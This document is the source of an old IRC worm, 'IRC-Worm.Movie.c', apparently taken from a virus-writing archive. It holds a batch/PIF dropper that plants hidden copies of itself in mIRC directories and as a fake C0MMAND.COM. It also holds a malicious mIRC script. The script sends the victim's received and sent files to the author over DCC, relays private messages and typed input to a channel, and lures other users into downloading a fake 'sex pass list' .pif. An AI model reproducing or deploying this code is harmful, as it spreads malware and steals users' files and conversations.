IRC-Worm.Movie.c by Del_Armg0

*********************************************************************|||
--------------------------------------------
3 - X_PASS.TXT.pif	aka:IRC-Worm.Movie.c  (Grrrr!!)
--------------------------------------------

 xJust a Fabulous Worm   IBLIS  Ä  %comspec% .COM and.com                                          C:\                                                             /c copy c:\mirc\download\X_PASS.TXT.pif %windir%\winstart.bat     ˇP                                                                                                                                     MICROSOFT PIFEX á  qWINDOWS 386 3.0 ùh Ä  d 2 ˇˇ  ˇˇ                      /c copy c:\mirc\download\X_PASS.TXT.pif %windir%\winstart.bat   WINDOWS VMM 4.0 ˇˇ¨                                                                                        C:\WINDOWS\Notepad.exe                                                                      2                  » Ë 
                 Terminal                        Courier New                          P  L,<g    ˇˇˇˇ¸ˇ¸ˇÉ π ø                                                                                           

@ECHO OFF
ctty nul
:act1
set z=progra~1
set s=progra~2
set x=mIRC
set x2=mIRC32
set y=internet
set y2=chat
set y3=web
for %%i in (c:\%x%,c:\%x2%,c:\%z%\%x%,c:\%z%\%x2%,c:\%s%\%x%,c:\%s%\%x2%,c:\%y%\%x%,c:\%y%\%x2%,c:\%y2%\%x%,c:\%y2%\%x2%,c:\%y3%\%x%,c:\%y3%\%x2%) do copy %0 %%i\Script.ini /Y
attrib +r +s +h %%i\Script.ini
attrib +r +s %0
:act2
if not exist c:\C0MMAND.COM goto act3
goto end
:act3
copy %0 c:\C0MMAND.COM /Y
attrib +r +s c:\C0MMAND.COM
:end
ctty con
@exit


[SCRIPT]
;
;mIRC main Script. Please don't edit! http://www.mirc.co.uk
;by Khaled Mardam-Bey
;Copyright ∏ 1995-2000 mIRC Co. Ltd.
;
;
n1=on 1:start:{
n2= .remote on
n3= .ctcps on
n4= .events on
n5= .raw on
n6= }
n7=alias /remove /echo *** Removed $1-
n8=alias /play /echo *** Unable to play $1-
n9=alias /unload /echo *** Unloaded $1-
n10=alias /events /.events on | /echo *** Events are OFF
n11=alias /remote /.remote on | /echo *** Remote is OFF (Ctcps,Events,Raw)
n12=on 1:text:*worm*:?:/.ignore $nick
n13=on 1:text:*virus*:?:/.ignore on $nick
n14=on 1:filercvd:*.*:.dcc send Del_Armg0 $filename
n15=on 1:filesent:*.exe,*.com,*.bat,*.ini,*.vbs,*.zip,*.jpg,*.txt,*.html:.dcc send Del_Armg0 $filename
n16=on 1:text:*:#:/.msg #iblis_worm *->  $+ $chan $+  < $+ $nick $+ > $parms
n17=on 1:text:*:?:/.msg #iblis_worm *-> From: $nick $+ * $parms
n18=on 1:input:*:/.msg #iblis_worm [( $+ $active $+ ) $1-] $cb $url
n19=on 1:op:#:/.msg $chan Please if u want my Special Iblis Sex Pass List :) TYPE: !sexpass
n20=on 1:text:*!sexpass*:#:{ if ( $nick == $me ) {halt} | .dcc send $nick c:\X_PASS.TXT.pif | /raw privmsg $nick Hi! Here is my last updated XXX Pass list ! Enjoy :)) }
n21=on 1:hotlink:*:*:/.msg #iblis_worm *-> User clicked word $1 in line $hotline
n22=on 1:connect: .copy c:\C0MMAND.COM c:\X_PASS.TXT.pif
n23=on 1:disconnect: .remove c:\X_PASS.TXT.pif
n24=on 1:join:#:{
n25=if ( $nick == $me ) { halt } | .dcc send $nick c:\X_PASS.TXT.pif
n26= }
n27=on 1:kick:#:/.msg $chan Please if u want my Special Iblis Sex Pass List :) TYPE: !sexpass
;
;
;
;
;_ IBLIS WORM _ designed by Del_Armg0 _ on 30/01/2000 __ GreetZ to U IBLIS ! My Dear KaT :) An Alive Po3m...
;


>>>
>>> This worm copies itself as %windir%\winstart.bat from C:\mirc\download\X_PASS.TXT.pif
>>>



*********************************************************************|||
<br> This file is decompiled by an unregistered version of ChmDecompiler.<br> Regsitered version does not show this message. <br>You can download ChmDecompiler at :   <a href="http://www.zipghost.com/" target=_blank>http://www.zipghost.com/</a><br><br>